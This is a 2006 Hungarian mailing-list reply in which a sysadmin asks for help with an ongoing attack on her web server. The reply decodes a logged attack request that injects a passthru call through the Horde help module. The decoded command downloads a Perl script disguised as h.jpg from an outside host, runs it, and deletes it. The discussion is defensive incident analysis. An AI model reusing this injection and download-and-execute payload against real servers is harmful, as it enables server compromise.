Segitseg, tamadjak a webszerveremet

2006. Okt. 5., Cs, 11:58:10 CEST

Hello!

On Wed, 4 Oct 2006, Kulyassa Robert wrote:

> On Wed, Oct 04, 2006 at 02:31:43PM +0200, Kovács Marietta wrote:
>>
>> Nem, a pingeken meg portscaneken már rutinszerűen rágom át magam. Most 
>> konkrétan két napja ez a fajta támadás megy amit leírtam. Valahogy 
>> indítanak egy sh-t az apache nevében (erre szeretnék rájönni hogyan), a 
Ha dekodoljuk azt, amit az elobb irtam, a kovetkezok jonnek ki belole:
GET /horde/services/help/?show=about&module=;".passthru(
" cd "./."tmp;
curl -O h.jpg http:"./."/./."PoChY.trei.ro"./."h;
wget http:"./.""./."PoChY.trei.ro"./."h.jpg;
fetch http:"./.""./."PoChY.trei.ro"./."h.jpg;
perl h.jpg;rm -rf h.jpg")

Ez pl. horde alol inditaná a felsorolt parancsokat feldolgozo shellt. 
Mala, nincs horde, nem tudom, mit csinal normal esetben a GET sorban 
megadott resze, de ha ilyen modon at lehet verni, eleg nagy biztonsagi 
lyuk van benne. Egyebkent "szokasos" modszer scripteket jpg vagy mas 
fajlnak alcazva letolteni, es raadasul, mivel nem binarisok, a /tmo noexec 
modu mountolasa sem segit ellenuk. Az apacshoz meg rendszerint hasznaljak 
a perlt,

--
---------------------------------------------------------------------
                                                          Bajan Ferenc